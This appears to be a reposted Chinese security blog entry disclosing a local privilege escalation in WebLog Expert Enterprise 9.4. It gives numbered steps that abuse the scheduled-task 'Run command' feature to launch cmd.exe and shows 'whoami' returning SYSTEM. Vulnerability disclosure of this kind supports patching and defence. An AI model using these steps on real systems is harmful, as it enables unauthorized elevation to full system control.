WebLog Expert Enterprise 9.4 权限提升漏洞

Software Link: https://www.weblogexpert.com/download.htm

Exploit:
1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed

2. Open WebLog Expert and then Schedule

3. Select Add, Next, choose ‘Sample – HTML’ under Profile, Next

4. Check ‘Run command…’ box, fill in ‘Command’ and ‘Run in’ as listed below
Command:

C:\Windows\System32\cmd.exe
Run in: C:\Windows\System32\

5. Select Next, Finish, Highlight New Task, select Run Now

6. Pop-up will appear in taskbar that reads ‘A program running on this computer is trying to display a message’

7. Select ‘View the message’

8. Command prompt is shown

C:\Windows\system32>whoami
nt authority\system

本文固定链接: https://www.unhonker.com/bug/2060.html | 90' s Blog|关注信息安全

该日志由 unhonker 于2018年04月03日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: WebLog Expert Enterprise 9.4 权限提升漏洞 | 90' s Blog|关注信息安全
关键字:

WebLog Expert Enterprise 9.4 权限提升漏洞:等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!